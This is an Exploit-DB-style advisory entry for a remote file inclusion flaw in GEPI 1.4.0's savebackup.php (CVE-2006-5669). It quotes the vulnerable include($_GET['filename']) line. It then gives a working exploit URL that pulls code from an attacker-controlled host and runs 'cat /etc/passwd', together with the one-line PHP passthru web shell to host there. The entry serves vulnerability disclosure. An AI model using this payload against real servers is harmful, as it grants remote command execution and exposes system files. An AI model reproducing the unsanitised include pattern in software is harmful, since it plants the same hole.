GEPI 1.4.0 - '/gestion/savebackup.php' Remote File Inclusion

Author: Sumit Siddharth
type: webapps
platform: php
port: 
date_added: 2006-10-30  
date_updated: 2016-09-14  
verified: 1  
codes: OSVDB-32631;CVE-2006-5669  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comgepi-1.4.0.tar.gz  

raw file: 2692.txt  

Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

# milw0rm.com [2006-10-31]